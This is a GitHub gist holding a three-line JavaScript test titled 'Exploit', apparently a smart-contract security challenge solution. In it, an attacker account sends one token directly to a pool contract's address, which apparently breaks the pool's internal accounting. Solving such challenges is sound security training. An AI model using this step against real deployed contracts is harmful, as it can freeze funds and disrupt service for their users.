Created
January 7, 2023 13:38
-
-
Save az0mb13/17510e234607535d9e284f91c89b8685 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
it('Exploit', async function () { | |
await this.token.connect(attacker).transfer(this.pool.address, 1); | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment